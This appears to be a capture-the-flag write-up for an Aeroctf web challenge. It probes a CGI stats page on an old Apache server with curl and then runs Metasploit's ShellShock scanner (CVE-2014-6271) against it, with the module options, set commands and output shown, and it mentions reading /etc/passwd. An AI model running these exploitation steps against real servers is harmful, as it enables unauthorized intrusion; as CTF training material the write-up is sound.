<html> <head> <style> body, pre { color: #7b7b7b; font: 30016px/25px"Roboto",Helvetica,Arial,sans-serif; } </style> <metaname="generator"content="vi2html"> </head> <body> </br> Welcome to control plane application of Aeroctf system.</br> </br> </br> On a dashboard you can see loading our system</br> </br> Stats: </br> <iframeframeborder=0width=800height=600src="/cgi-bin/stats"></iframe> </body> </html>
It seems it is using a CGI. And it seems it is an Apache httpd webserver:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
curl -v 'http://81.23.11.159:8080/cgi-bin/stats' * Trying 81.23.11.159... * TCP_NODELAY set * Connected to 81.23.11.159 (81.23.11.159) port 8080 (#0) > GET /cgi-bin/stats HTTP/1.1 > Host: 81.23.11.159:8080 > User-Agent: curl/7.64.0 > Accept: */* > < HTTP/1.1 200 OK < Date: Fri, 08 Mar 2019 19:32:50 GMT < Server: Apache/2.2.22 (Debian) < Vary: Accept-Encoding < Transfer-Encoding: chunked < Content-Type: text/html < Fri Mar 8 19:32:50 UTC 2019 19:32:50 up 93 days, 5:01, 0 users, load average: 0.05, 0.02, 0.00 * Connection #0 to host 81.23.11.159 left intact
So let's fire metasploit because we may have a ShellShock vulnerability here.
First we will use the auxiliary scanner to check that:
Name Current Setting Required Description ---- --------------- -------- ----------- CMD /usr/bin/id yes Command to run (absolute paths required) CVE CVE-2014-6271 yes CVE to check/exploit (Accepted: CVE-2014-6271, CVE-2014-6278) HEADER User-Agent yes HTTP header to use METHOD GET yes HTTP method to use Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target address range or CIDR identifier RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI yes Path to CGI script THREADS 1 yes The number of concurrent threads VHOST no HTTP server virtual host
msf5 auxiliary(scanner/http/apache_mod_cgi_bash_env) > set RHOSTS 81.23.11.159 RHOSTS => 81.23.11.159 msf5 auxiliary(scanner/http/apache_mod_cgi_bash_env) > set RPORT 8080 RPORT => 8080 msf5 auxiliary(scanner/http/apache_mod_cgi_bash_env) > set TARGETURI /cgi-bin/stats TARGETURI => /cgi-bin/stats msf5 auxiliary(scanner/http/apache_mod_cgi_bash_env) > run
/bin/cat << EOM </pre> EOM test Content-type: text/html
Fri Mar 8 20:27:27 UTC 2019
I look around for some minutes where the flag could be when I decided to take a look at /etc/passwd, maybe a weird user will point me to a vulnerable service or something.